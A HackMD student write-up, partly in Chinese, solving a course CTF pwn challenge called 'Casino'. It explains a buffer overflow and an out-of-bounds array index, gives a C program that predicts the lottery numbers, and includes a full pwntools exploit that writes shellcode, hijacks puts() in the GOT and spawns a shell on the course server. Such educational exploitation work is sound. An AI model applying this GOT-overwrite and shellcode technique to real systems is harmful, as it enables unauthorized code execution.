Try   HackMD
tags: 程安

CS 2019 Fall - Homework 0x05

[0x05] Casino

先 checksec

CANARY    : ENABLED
FORTIFY   : ENABLED
NX        : disabled
PIE       : disabled
RELRO     : Partial   --> GOT可寫

然後去找到可以 overflow 的點







char name[0x10] = {0};
read( 0 , name , 0x100 );  <-- 可寫長度超出name的範圍

int guess[6] = {0};
int idx = read_int() - 1;
guess[idx] = read_int();   <-- idx可超出guess的範圍

這題的主要流程 & 一些小細節︰(GOT hijack)

  1. 把 shellcode 寫到 name 上
    • name寫到 overflow 可以蓋過seedage
    • 數值產生順序 :seednameage
      • 我們可以藉由name overflow 來控制seed,進而預測lottery[i]的結果
        → 寫一個 c code 來生成
      • 如果直接把 shellcode 寫在name上,後面輸入age時會蓋到 shellcode 的內容
        → 把 shellcode 的位置調整到age後面
  2. 利用 guess[idx] 的 idx 來改寫 GOT
    • rip為 8 Bytes,但藉由read_int()一次只能改寫 4 Bytes,所以要改寫兩次
  3. 觸發某個 function 讓他去 GOT 上查表,並跳轉到 shellcode 上
    • 目標為puts()而不是printf()
      • 理由為printf()在進行第二輪猜測時仍會使用到,如果這時已經改寫了 GOT 上printf()的位置,那就會跳到奇怪的地方導致程式死去












// lottery.c
#include <stdio.h>
#include <stdlib.h>
int main() {
    int lottery[6] = {0}, seed = 0;
    srand(seed);
    for (int i = 0; i < 6; ++i) {
        lottery[i] = rand() % 100;
        printf("%d, ", lottery[i]);
        // lottery = {83, 86, 77, 15, 93, 35}
    }
}






























# script.py
from pwn import *

context.arch = 'amd64'
host, port = "edu-ctf.csie.org", 10172
p = remote(host, port)

payload  = "FUCK" * 4   # &name = 0x6020F0
payload += "\x00" * 4   # seed = 0
payload += "\x00" * 4   # age  = 0, but will be overwrite later
                        # &shellcode = 0x602108 = 6299912d
shellcode = pwnlib.shellcraft.amd64.linux.sh()
p.sendlineafter(": ", payload + asm(shellcode))

for i in range(1 + 6):
    p.sendlineafter(": ", "20")
p.sendlineafter(": ", "1")
p.sendlineafter(": ", "-42") # overwrite guess[-43]
p.sendlineafter(": ", "0")   # 0x0000000000602108
                             #   |------|
lottery = [83, 86, 77, 15, 93, 35]

for i in range(6):
    p.sendlineafter(": ", str(lottery[i]))
p.sendlineafter(": ", "1")
p.sendlineafter(": ", "-43")     # overwrite guess[-44]
p.sendlineafter(": ", "6299912") # 0x0000000000602108
                                 #           |------|
p.interactive()

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

Last changed by 
a5180352
0
387

Read more

CS 2019 Fall & AIS3 EOF 2019 - by ZR

Jan 16, 2020
CS 2019 Fall - Homework 0x08

Jan 15, 2020
CS 2019 Fall - Homework 0x09

Jan 4, 2020
CS 2019 Fall - Homework 0x03

Jan 2, 2020
Read more from a5180352
Published on HackMD